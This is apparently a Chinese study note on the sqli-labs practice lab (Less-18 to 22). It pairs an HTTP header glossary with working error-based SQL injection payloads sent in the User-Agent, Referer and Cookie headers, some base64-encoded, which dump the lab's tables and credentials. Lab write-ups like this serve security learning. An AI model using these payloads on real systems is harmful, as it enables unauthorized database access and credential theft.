之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
HTTP 头注入
HTTP 头部详解
Accept
告诉WEB 服务器自己接受什么介质类型,/ 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。
Accept-Charset
浏览器申明自己接收的字符集
Accept-Encoding
浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法(gzip,deflate)
Accept-Language
览器申明自己接收的语言
语言跟字符集的区别:中文是语言,中文有多种字符集,比如big5,gb2312,gbk 等等
Accept-Ranges
WEB 服务器表明自己是否接受获取其某个实体的一部分(比如文件的一部分)的请求。bytes:表示接受,none:表示不接受。
Age
当代理服务器用自己缓存的实体去响应请求时,用该头部表明该实体从产生到现在经过多长时间了
Authorization
当客户端接收到来自WEB 服务器的WWW-Authenticate 响应时,用该头部来回应自己的身份验证信息给WEB 服务器。
Cache-Control
请求:no-cache(不要缓存的实体,要求现在从WEB 服务器去取)
- max-age:(只接受Age 值小于max-age 值,并且没有过期的对象)
- max-stale:(可以接受过去的对象,但是过期时间必须小于max-stale 值)
- min-fresh:(接受其新鲜生命期大于其当前Age 跟min-fresh 值之和的缓存对象)
- 响应:public(可以用Cached 内容回应任何用户)
- private(只能用缓存内容回应先前请求该内容的那个用户)
- no-cache(可以缓存,但是只有在跟WEB 服务器验证了其有效后,才能返回给客户端)
- max-age:(本响应包含的对象的过期时间)
- ALL: no-store(不允许缓存)
Connection:请求
close(告诉WEB 服务器或者代理服务器,在完成本次请求的响应后,断开连接,不要等待本次连接的后续请求了)。
- keepalive(告诉WEB 服务器或者代理服务器,在完成本次请求的响应后,保持连接,等待本次连接的后续请求)。
- 响应:close(连接已经关闭)。
- keepalive(连接保持着,在等待本次连接的后续请求)。
- Keep-Alive:如果浏览器请求保持连接,则该头部表明希望WEB 服务器保持连接多长时间(秒)。例如:Keep-Alive:300
Content-Encoding
WEB 服务器表明自己使用了什么压缩方法(gzip,deflate)压缩响应中的对象。例如:Content-Encoding:gzip
Content-Language
WEB 服务器告诉浏览器自己响应的对象的语言。
Content-Length
WEB 服务器告诉浏览器自己响应的对象的长度。例如:Content-Length:26012
Content-Range
WEB 服务器表明该响应包含的部分对象为整个对象的哪个部分。
例如:Content-Range: bytes 21010-47021/47022Content-Type
WEB 服务器告诉浏览器自己响应的对象的类型。
例如:Content-Type:application/xmlETag
就是一个对象(比如URL)的标志值,就一个对象而言,比如一个 html 文件,如果被修改了,其 Etag 也会别修改,所以 ETag 的作用跟Last-Modified 的作用差不多,主要供WEB 服务器判断一个对象是否改变了。比如前一次请求某个 html 文件时,获得了其 ETag,当这次又请求这个文件时,浏览器就会把先前获得的 ETag 值发送给 WEB 服务器,然后 WEB 服务器会把这个 ETag 跟该文件的当前 ETag 进行对比,然后就知道这个文件有没有改变了。
Expired
WEB 服务器表明该实体将在什么时候过期,对于过期了的对象,只有在跟WEB 服务器验证了其有效性后,才能用来响应客户请求。是HTTP/1.0 的头部。
例如:Expires:Sat, 23 May 2009 10:02:12 GMTHost
客户端指定自己想访问的WEB 服务器的域名/IP 地址和端口号。
例如:Host:rss.sina.com.cnIf-Match
如果对象的ETag 没有改变,其实也就意味著对象没有改变,才执行请求的动作。.
If-None-Match
如果对象的ETag 改变了,其实也就意味著对象也改变了,才执行请求的动作。
If-Modified-Since
如果请求的对象在该头部指定的时间之后修改了,才执行请求的动作( 比如返回对象), 否则返回代码304 ,告诉浏览器该对象没有修改。
例如:If-Modified-Since:Thu, 10 Apr 2008 09:14:42 GMTIf-Unmodified-Since
如果请求的对象在该头部指定的时间之后没修改过,才执行请求的动作(比如返回对象)。
If-Range
浏览器告诉WEB 服务器,如果我请求的对象没有改变,就把我缺少的部分给我,如果对象改变了,就把整个对象给我。浏览器通过发送请求对象的ETag 或者自己所知道的最后修改时间给WEB 服务器,让其判断对象是否改变了。总是跟Range 头部一起使用。
Last-Modified
WEB 服务器认为对象的最后修改时间,比如文件的最后修改时间,动态页面的最后产生时间等等。例如:Last-Modified:Tue, 06 May 2008 02:42:43 GMT22、Location:WEB 服务器告诉浏览器,试图访问的对象已经被移到别的位置了,到该头部指定的位置去取。
例如: Location : http://i0.sinaimg.cn/dy/deco/2008/0528/sinahome_0803_ws_005_text_0.gifPramga
主要使用Pramga: no-cache,相当于Cache-Control: no-cache。
例如:Pragma:no-cacheProxy-Authenticate
代理服务器响应浏览器,要求其提供代理身份验证信息。
Proxy-Authorization
浏览器响应代理服务器的身份验证请求,提供自己的身份信息。
Range
浏览器(比如Flashget 多线程下载时)告诉WEB 服务器自己想取对象的哪部分。
例如:Range: bytes=1173546-Referer
浏览器向WEB 服务器表明自己是从哪个网页/URL 获得/点击当前请求中的网址/URL。例如:Referer:http://www.sina.com/
Server
WEB 服务器表明自己是什么软件及版本等信息。
例如:Server:Apache/2.0.61(Unix)User-Agent
浏览器表明自己的身份(是哪种浏览器)。
例如:User-Agent:Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14Transfer-Encoding
WEB 服务器表明自己对本响应消息体(不是消息体里面的对象)作了怎样的编码,比如是否分块(chunked)。例如:Transfer-Encoding: chunked
Vary
WEB 服务器用该头部的内容告诉Cache 服务器,在什么条件下才能用本响应所返回的对象响应后续的请求。假如源WEB 服务器在接到第一个请求消息时,其响应消息的头部为:Content- Encoding: gzip; Vary: Content-Encoding 那么Cache 服务器会分析后续请求消息的头部,检查其Accept-Encoding,是否跟先前响应的Vary 头部值一致,即是否使用相同的内容编码方法,这样就可以防止Cache 服务器用自己Cache 里面压缩后的实体响应给不具备解压能力的浏览器。例如:Vary:Accept-Encoding
Via
列出从客户端到OCS 或者相反方向的响应经过了哪些代理服务器,他们用什么协议(和版本)发送的请求。当客户端请求到达第一个代理服务器时,该服务器会在自己发出的请求里面添加Via 头部,并填上自己的相关信息,当下一个代理服务器收到第一个代理服务器的请求时,会在自己发出的请求里面复制前一个代理服务器的请求的Via 头部,并把自己的相关信息加到后面,以此类推,当OCS 收到最后一个代理服务器的请求时,检查Via 头部,就知道该请求所经过的路由。例如:Via:1.0 236.D0707195.sina.com.cn:80(squid/2.6.STABLE13)
推荐工具
- live http headers(firefox 插件)
- Tamper data(firefox 插件)
Less-18 User-Agent 域
测试
在 username 输入 admin
在 password 输入 admin
使用 burpsuite 抓包
将 http 头改为 User-Agent: aaaaaaa(任意)
猜数据库名
User-Agent: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e)) and ‘1’=’1
User-Agent: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e)),1,1)#
结果为 security
猜表名
User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)),1,1)#
User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)) and ‘1’=’1
结果为 emails,referers,uagents,users
猜列名
User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)),1,1)#
User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)) and ‘1’=’1
结果为 id,username,password
猜数据
User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(username) from security.users limit 0,1),0x7e)),1,1)#
User-Agent: ‘or extractvalue(1,concat(0x7e,(select group_concat(password) from security.users limit 0,1),0x7e)) and ‘1’=’1
结果为
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
Less-19 Referer 域
测试
在 username 输入 admin
在 password 输入 admin
使用 burpsuite 抓包
将 http 头改为 Referer: aaaaaaa(任意)
猜数据库
Referer: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and ‘1’=’1
Referer: ‘and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e)),1)#
结果为 security
猜表名
Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)),1)#
Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)) and ‘1’=’1
结果为 emails,referers,uagents,users
猜列名
Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)),1)#
Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)) and ‘1’=’1
结果为 id,username,password
- 猜数据
Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(username) from security.users limit 0,1),0x7e)),1)#
Referer: ‘or extractvalue(1,concat(0x7e,(select group_concat(password) from security.users limit 0,1),0x7e)) and ‘1’=’1
结果为
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin
password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
Less-20 Cookie 注入
测试
在 username 输入 admin
在 password 输入 admin
使用 burpsuite 抓包
添加一行 cookie值:
Cookie: uname=admin1’and extractvalue(1,concat(0x7e,(select version()),0x7e))#
猜数据库
Cookie: uname=1’and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and ‘1’=’1
Cookie: uname=1’and extractvalue(1,concat(0x7e,(select database()),0x7e))#
结果为 security
猜表名
Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e))#
Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),0x7e)) and ‘1’=’1
结果为 emails,referers,uagents,users
猜列名
Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e))#
Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),0x7e)) and ‘1’=’1
结果为 id,username,password
猜数据
Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(username) from security.users limit 0,1),0x7e))#
Cookie: uname=1’or extractvalue(1,concat(0x7e,(select group_concat(password) from security.users limit 0,1),0x7e)) and ‘1’=’1
结果为
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
Less-21 Cookie 注入 - base64 编码 - 单引号
测试
在 username 输入 admin
在 password 输入 admin
使用 burpsuite 抓包
添加一行 cookie值:
Cookie: uname=1’and extractvalue(1,concat(0x7e,(select version()),0x7e))and ‘1’=’1
将 name 值进行 bas64 编码
Cookie: uname=MSdhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB2ZXJzaW9uKCkpLDB4N2UpKWFuZCAnMSc9JzE=
猜数据库
Cookie: uname=1’and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and ‘1’=’1
Cookie: uname=MSdhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpIGxpbWl0IDEsMSksMHg3ZSkpYW5kICcxJz0nMQ==
结果为 security
Less-22 Cookie 注入 - base64 编码 - 双引号
测试
在 username 输入 admin
在 password 输入 admin
使用 burpsuite 抓包
添加一行 cookie值:
Cookie: uname=1”and extractvalue(1,concat(0x7e,(select version()),0x7e))and “1”=”1
将 name 值进行 bas64 编码
Cookie: uname=MSJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB2ZXJzaW9uKCkpLDB4N2UpKWFuZCAiMSI9IjE=
猜数据库
Cookie: uname=1”and extractvalue(1,concat(0x7e,(select database() limit 1,1),0x7e))and “1”=”1
Cookie: uname=MSJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpIGxpbWl0IDEsMSksMHg3ZSkpYW5kICIxIj0iMQ==
结果为 security